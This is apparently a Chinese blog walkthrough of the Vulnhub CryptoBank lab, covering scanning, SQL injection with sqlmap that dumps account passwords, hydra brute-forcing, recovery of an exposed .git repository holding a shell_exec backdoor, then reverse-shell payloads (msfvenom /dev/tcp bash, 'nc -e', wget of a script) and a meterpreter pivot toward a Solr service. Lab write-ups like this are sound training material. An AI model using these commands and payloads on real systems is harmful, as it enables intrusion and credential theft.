Vulnhub之CryptoBank靶机详细测试过程

CryptoBank

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                        
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:03      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:1f:96:d2      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.254  08:00:27:d0:df:39      1      60  PCS Systemtechnik GmbH      

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-03 22:11 EDT
Nmap scan report for localhost (192.168.56.254)
Host is up (0.0015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 7f4e59dfb75549cfd3122d19010543f7 (RSA)
|   256 5e1b3798abc7e6ee5ff8df4314de284e (ECDSA)
|_  256 8ea9909f6e51b1c726ea07ac6928b31c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: CryptoBank
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:D0:DF:39 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

获得Shell

需要添加主机记录才能访问login以及register

──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sudo vim /etc/hosts                                        
                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.254  cryptobank.local

注册功能当前是关闭的。

┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ nikto -h http://192.168.56.254
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.56.254
+ Target Hostname:    192.168.56.254
+ Target Port:        80
+ Start Time:         2023-06-03 22:19:43 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 82f7, size: 5a30acd90b6ab, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ /info.php: Output from the phpinfo() function was found.
+ /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /info.php?file=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ 8255 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2023-06-03 22:19:57 (GMT-4) (14 seconds)

──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh,.js
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.254
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,txt,html,sh,js
[+] Timeout:                 10s
===============================================================
2023/06/03 22:20:22 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 33527]
/.html                (Status: 403) [Size: 279]
/index.js             (Status: 200) [Size: 458095]
/info.php             (Status: 200) [Size: 86157]
/assets               (Status: 301) [Size: 317] [--> http://192.168.56.254/assets/]
/development          (Status: 401) [Size: 461]
/trade                (Status: 301) [Size: 316] [--> http://192.168.56.254/trade/]
/closed.html          (Status: 200) [Size: 65]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]

/development目录需要网页基础认证,看是不是可以用hydra破解,但是没有成功。

┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 80 -f 192.168.56.254 http-get /development
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).


注意到在网页中Team部分每个成员有联系按钮,通过浏览器地址栏中可创建用户名列表

如:

http://cryptobank.local/william.d
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ cat users_list 
william.d
julius.b
bill.w
john.d

用Burpsuite拦截请求,并存储为文件req.txt,然后扫描一下是否存在SQL注入漏洞:

┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ ls
hydra.restore  nmap_full_scan  req.txt  users_list
                                                    
──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sqlmap -r req.txt --level=3
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N

经过SQLMAP的测试,user参数存在SQL注入漏洞,接下来将数据库信息Dump出来:

(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sqlmap -r req.txt --level=3 --dbs
available databases [5]:
[*] cryptobank
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys

(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sqlmap -r req.txt --level=3 -D cryptobank --tables
Database: cryptobank
[3 tables]
+----------+
| accounts |
| comments |
| loans    |
+----------+

─(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sqlmap -r req.txt --level=3 -D cryptobank -T accounts --columns
Database: cryptobank
Table: accounts
[4 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| balance    | int(11)      |
| id_account | int(11)      |
| password   | varchar(100) |
| username   | varchar(50)  |
+------------+--------------+

将SQLMAP得到的用户名和密码分别创建为字典

(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sqlmap -r req.txt --level=3 -D cryptobank -T accounts -C username,password --dump
Database: cryptobank
Table: accounts
[12 entries]
+--------------------+------------+
| username           | password   |
+--------------------+------------+
| spongebob          | 3mwZd896Me |
| bill.w             | 3Nrc2FYJMe |
| deadbeef           | 6X7DnLF5pG |
| dreadpirateroberts | 7HwAEChFP9 |
| notanirsagent      | 8hPx2Zqn4b |
| williamdelisle     | gFG7pqE5cn |
| buzzlightyear      | LnBHvEhmw3 |
| mrbitcoin          | LxZjkK87nu |
| johndl33t          | NqRF4W85yf |
| juliusthedeveloper | wJWm4CgV26 |
| patric             | x8CRvHqgPp |
| tim                | zm2gBcaxd3 |
+--------------------+------------+

┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ cat user.dict                                                                    
spongebob          
bill.w            
deadbeef           
dreadpirateroberts 
notanirsagent      
williamdelisle     
buzzlightyear      
mrbitcoin         
johndl33t          
juliusthedeveloper 
patric             
tim                
                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ cat password.dict 
3mwZd896Me
3Nrc2FYJMe
6X7DnLF5pG
7HwAEChFP9
8hPx2Zqn4b
gFG7pqE5cn
LnBHvEhmw3
LxZjkK87nu
NqRF4W85yf
wJWm4CgV26
x8CRvHqgPp
zm2gBcaxd3

并且把之前得到的用户名也追加到user.dict字典中

─(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ cat users_list >> user.dict 

因为前面/development的网页基础认证没有破解出密码,再次用从数据库得到的密码以及用户创建的字典进行破解:

┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ hydra -L user.dict -P password.dict -s 80 -f 192.168.56.254 http-get /development
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-03 23:23:51
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 192 login tries (l:16/p:12), ~12 tries per task
[DATA] attacking http-get://192.168.56.254:80/development
[80][http-get] host: 192.168.56.254   login: julius.b   password: wJWm4CgV26
[STATUS] attack finished for 192.168.56.254 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-06-03 23:24:03

┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ dirb http://192.168.56.254/development/   

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jun  3 23:25:37 2023
URL_BASE: http://192.168.56.254/development/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.254/development/ ----
(!) WARNING: All responses for this directory seem to be CODE = 401.                                                                                        
    (Use mode '-w' if you want to scan it anyway)
                                                                       

用得到的用户名和密码再扫描一下/development

┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ dirb http://192.168.56.254/development/ -u  julius.b:wJWm4CgV26

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jun  3 23:27:42 2023
URL_BASE: http://192.168.56.254/development/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
AUTHORIZATION: julius.b:wJWm4CgV26

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.254/development/ ----
==> DIRECTORY: http://192.168.56.254/development/backups/                                                                                                   
+ http://192.168.56.254/development/index.html (CODE:200|SIZE:21)                                                                                           
+ http://192.168.56.254/development/php.ini (CODE:200|SIZE:109)                                                                                             
==> DIRECTORY: http://192.168.56.254/development/tools/                                                                                                     
                                                                                                                                                            
---- Entering directory: http://192.168.56.254/development/backups/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                            
---- Entering directory: http://192.168.56.254/development/tools/ ----
+ http://192.168.56.254/development/tools/index.php (CODE:403|SIZE:689)                                                                                     
==> DIRECTORY: http://192.168.56.254/development/tools/Resources/                                                                                           
                                                                                                                                                            
---- Entering directory: http://192.168.56.254/development/tools/Resources/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sat Jun  3 23:27:48 2023
DOWNLOADED: 9224 - FOUND: 3

在/development/下发现了/backups /tools/子目录

http://cryptobank.local/development/backups/home/

需要对/home目录继续扫描

┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ dirb http://cryptobank.local/development/backups/home/         

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jun  3 23:30:03 2023
URL_BASE: http://cryptobank.local/development/backups/home/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://cryptobank.local/development/backups/home/ ----
+ http://cryptobank.local/development/backups/home/.git/HEAD (CODE:200|SIZE:23)                                                                             
+ http://cryptobank.local/development/backups/home/.htaccess (CODE:200|SIZE:12)                                                                             
==> DIRECTORY: http://cryptobank.local/development/backups/home/assets/                                                                                     
==> DIRECTORY: http://cryptobank.local/development/backups/home/development/                                                                                
+ http://cryptobank.local/development/backups/home/index.html (CODE:200|SIZE:33603)                                                                         
==> DIRECTORY: http://cryptobank.local/development/backups/home/trade/                                                                                      
                                                                                                                                                            
---- Entering directory: http://cryptobank.local/development/backups/home/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                            
---- Entering directory: http://cryptobank.local/development/backups/home/development/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                            
---- Entering directory: http://cryptobank.local/development/backups/home/trade/ ----
+ http://cryptobank.local/development/backups/home/trade/index.php (CODE:403|SIZE:689)                                                                      
                                                                                                                                                            
-----------------
END_TIME: Sat Jun  3 23:30:08 2023
DOWNLOADED: 9224 - FOUND: 4

发现了/.git目录

接下来用githack工具

─(kali㉿kali)-[~/Toolsets/GitHack]
└─$ python GitHack.py http://cryptobank.local/development/backups/home/.git/

┌──(kali㉿kali)-[~/Toolsets/GitHack]
└─$ cd cryptobank.local 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Toolsets/GitHack/cryptobank.local]
└─$ ls -alh
total 560K
drwxr-xr-x 6 kali kali 4.0K Jun  3 23:31 .
drwxr-xr-x 7 kali kali 4.0K Jun  3 23:31 ..
drwxr-xr-x 6 kali kali 4.0K Jun  3 23:31 assets
-rw-r--r-- 1 kali kali   65 Jun  3 23:31 closed.html
drwxr-xr-x 3 kali kali 4.0K Jun  3 23:31 development
-rw-r--r-- 1 kali kali  260 Jun  3 23:31 dev-notes.txt
-rw-r--r-- 1 kali kali   66 Jun  3 23:31 .gitattributes
-rw-r--r-- 1 kali kali  33K Jun  3 23:31 index.html
-rw-r--r-- 1 kali kali 448K Jun  3 23:31 index.js
-rw-r--r-- 1 kali kali 5.3K Jun  3 23:31 ninjacheck.php
drwxr-xr-x 8 kali kali 4.0K Jun  3 23:31 ninjafirewall
-rw-r--r-- 1 kali kali  29K Jun  3 23:31 style.css
drwxr-xr-x 3 kali kali 4.0K Jun  3 23:31 trade
                                                                                                                                                             
┌──(kali㉿kali)-[~/Toolsets/GitHack/cryptobank.local]
└─$ cd development     
                                                                                                                                                             
┌──(kali㉿kali)-[~/Toolsets/GitHack/cryptobank.local/development]
└─$ ls -alh
total 24K
drwxr-xr-x 3 kali kali 4.0K Jun  3 23:31 .
drwxr-xr-x 6 kali kali 4.0K Jun  3 23:31 ..
-rw-r--r-- 1 kali kali  154 Jun  3 23:31 .htaccess
-rw-r--r-- 1 kali kali  109 Jun  3 23:31 php.ini
drwxr-xr-x 6 kali kali 4.0K Jun  3 23:31 tools
-rw-r--r-- 1 kali kali  109 Jun  3 23:31 .user.ini
                                                                                                                                                             
┌──(kali㉿kali)-[~/Toolsets/GitHack/cryptobank.local/development]
└─$ cd tools      
                                                                                                                                                             
┌──(kali㉿kali)-[~/…/GitHack/cryptobank.local/development/tools]
└─$ ls -alh
total 32K
drwxr-xr-x 6 kali kali 4.0K Jun  3 23:31 .
drwxr-xr-x 3 kali kali 4.0K Jun  3 23:31 ..
drwxr-xr-x 2 kali kali 4.0K Jun  3 23:31 CommandExecution
drwxr-xr-x 3 kali kali 4.0K Jun  3 23:31 FileInclusion
drwxr-xr-x 2 kali kali 4.0K Jun  3 23:31 FileUpload
-rw-r--r-- 1 kali kali 1014 Jun  3 23:31 homepage.html
-rw-r--r-- 1 kali kali   62 Jun  3 23:31 index.php
drwxr-xr-x 2 kali kali 4.0K Jun  3 23:31 Resources
                                                                                                                                                             
┌──(kali㉿kali)-[~/…/GitHack/cryptobank.local/development/tools]
└─$ cd CommandExecution 
                                                                                                                                                             
┌──(kali㉿kali)-[~/…/cryptobank.local/development/tools/CommandExecution]
└─$ ls     
commandexec.html  CommandExec.php
                                                                                                                                                             
┌──(kali㉿kali)-[~/…/cryptobank.local/development/tools/CommandExecution]
└─$ cat CommandExec.php 
<html>
  <head>
    
    <title>CommandExec-1</title>
  </head>
  <body>
    <div style="background-color:#afafaf;padding:15px;border-radius:20px 20px 0px 0px">
      <button type="button" name="homeButton" onclick="location.href='../homepage.html';">Home Page</button>
      <button type="button" name="mainButton" onclick="location.href='commandexec.html';">Main Page</button>
    </div>
    <div style="background-color:#c9c9c9;padding:20px;">
      <h1 align="center">Auth to execute system command</h1>
    <form align="center" action="CommandExec.php" method="$_GET">
      <label align="center">Username:</label><br>
      <input align="center" type="text" name="username" value=""><br>
      <label>Password:</label><br>
      <input align="center" type="password" name="password" value=""><br>
    <input align="center" type="submit" value="Submit">

    </form>
  </div>
  <div style="background-color:#ecf2d0;padding:20px;border-radius:0px 0px 20px 20px" align="center">
    <?php
    if(isset($_GET["username"])){
      //echo shell_exec($_GET["username"]);
      if($_GET["password"] == "wJWm4CgV26")
        echo shell_exec($_GET["username"]);
    }

    ?>
  </div>
  </body>
</html>
                                                    

因此可以访问路径/development/tools/

从CommandExec.php 文件得知,只要密码输入为wJWm4CgV26,然后会通过函数shell_exec执行命令,命令参数为username

证明可以正确执行命令

在username直接填写nc -e /bin/bash 192.168.56.253 5555,发现返回错误:

可以在Kali Linux常见shell文件,然后利用wget命令上传到目标主机

──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ msfvenom -p cmd/unix/reverse_bash LHOST=192.168.56.253 LPORT=5555 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 78 bytes
bash -c '0<&191-;exec 191<>/dev/tcp/192.168.56.253/5555;sh <&191 >&191 2>&191'
─(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ echo '0<&191-;exec 191<>/dev/tcp/192.168.56.253/5555;sh <&191 >&191 2>&191' > revshell.sh      

┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

然后在username中输入wget http://192.168.56.253:8000/revshell.sh

利用ls命令查看是否上传成功

成功上传

然后在username中输入bash revshell.sh

┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.253] from (UNKNOWN) [192.168.56.254] 38662
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cryptobank:/var/www/cryptobank/development/tools/CommandExecution$ cd /home
<tobank/development/tools/CommandExecution$ cd /home                        
www-data@cryptobank:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root       root       4.0K Apr 10  2020 .
drwxr-xr-x 24 root       root       4.0K Apr 10  2020 ..
drwxr-xr-x  5 cryptobank cryptobank 4.0K Apr 16  2020 cryptobank
www-data@cryptobank:/home$ cd cryptobank
cd cryptobank
www-data@cryptobank:/home/cryptobank$ ls -alh
ls -alh
total 52K
drwxr-xr-x 5 cryptobank cryptobank 4.0K Apr 16  2020 .
drwxr-xr-x 3 root       root       4.0K Apr 10  2020 ..
-rw------- 1 cryptobank cryptobank   11 Apr 16  2020 .bash_history
-rw-r--r-- 1 cryptobank cryptobank  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 cryptobank cryptobank 3.7K Apr  4  2018 .bashrc
drwx------ 2 cryptobank cryptobank 4.0K Apr 10  2020 .cache
-rw-r--r-- 1 root       root         26 Apr 11  2020 .gitconfig
drwx------ 3 cryptobank cryptobank 4.0K Apr 10  2020 .gnupg
drwxrwxr-x 3 cryptobank cryptobank 4.0K Apr 10  2020 .local
-rw------- 1 root       root       1.7K Apr 11  2020 .mysql_history
-rw-r--r-- 1 cryptobank cryptobank  807 Apr  4  2018 .profile
-rw-r--r-- 1 cryptobank cryptobank    0 Apr 10  2020 .sudo_as_admin_successful
-rw-rw-r-- 1 cryptobank cryptobank  169 Apr 11  2020 .wget-hsts
-rwxrwxrwx 1 cryptobank cryptobank   28 Apr 16  2020 flag.txt
www-data@cryptobank:/home/cryptobank$ cat flag.txt
cat flag.txt
flag{l4szl0h4ny3cz1smyh3r0}
www-data@cryptobank:/home/cryptobank$ 

升级成meterpreter

┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.253 LPORT=6666 -f elf -o esclate.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
Saved as: esclate.elf


┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ msfconsole -q                                                                                      
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LHOST 192.168.56.253
LHOST => 192.168.56.253
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.253:6666 
[*] Sending stage (3045348 bytes) to 192.168.56.254
[*] Meterpreter session 1 opened (192.168.56.253:6666 -> 192.168.56.254:48398) at 2023-06-04 00:05:17 -0400

meterpreter > netstat -tunlp

Connection list
===============

    Proto  Local address             Remote address               State        User  Inode  PID/Program name
    -----  -------------             --------------               -----        ----  -----  ----------------
    tcp    127.0.0.53:53             0.0.0.0:*                    LISTEN       101   0
    tcp    0.0.0.0:22                0.0.0.0:*                    LISTEN       0     0
    tcp    172.17.0.1:8983           0.0.0.0:*                    LISTEN       0     0
    tcp    127.0.0.1:3306            0.0.0.0:*                    LISTEN       111   0
    tcp    192.168.56.254:38688      192.168.56.253:5555          ESTABLISHED  33    0
    tcp    192.168.56.254:48398      192.168.56.253:6666          ESTABLISHED  33    0
    tcp    :::22                     :::*                         LISTEN       0     0
    tcp    :::80                     :::*                         LISTEN       0     0
    tcp    ::ffff:192.168.56.254:80  ::ffff:192.168.56.253:39188  ESTABLISHED  33    0
    tcp    ::ffff:192.168.56.254:80  ::ffff:192.168.56.253:36640  CLOSE_WAIT   33    0
    udp    127.0.0.53:53             0.0.0.0:*                                 101   0
    udp    192.168.56.254:68         0.0.0.0:*                                 100   0

发现运行8983端口。

meterpreter > run autoroute --help

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[-] Missing -s (subnet) option
meterpreter > run autoroute -s 172.17.0.0/24 

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.17.0.0/255.255.255.0...
[+] Added route to 172.17.0.0/255.255.255.0 via 192.168.56.254
[*] Use the -p option to list all active routes

为了观察8983端口的服务,创建端口转发(172.17.0.1是容器的本地地址)


meterpreter > portfwd add -l 81 -p 8983 -r 172.17.0.1
[*] Forward TCP relay created: (local) :81 -> (remote) 172.17.0.1:8983


然后在Kali Linux浏览器访问http://127.0.0.1:81

运行solr服务,查找漏洞利用代码

msf6 exploit(multi/handler) > search solr

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  exploit/multi/http/solr_velocity_rce            2019-10-29       excellent  Yes    Apache Solr Remote Code Execution via Velocity Template
   1  auxiliary/scanner/http/log4shell_scanner        2021-12-09       normal     No     Log4Shell HTTP Scanner
   2  exploit/linux/http/trendmicro_websecurity_exec  2020-06-10       excellent  Yes    Trend Micro Web Security (Virtual Appliance) Remote Code Execution



猜测solr的密码为solr

posted @ 2023-06-04 12:35  Jason_huawen  阅读(242)  评论(0)    收藏  举报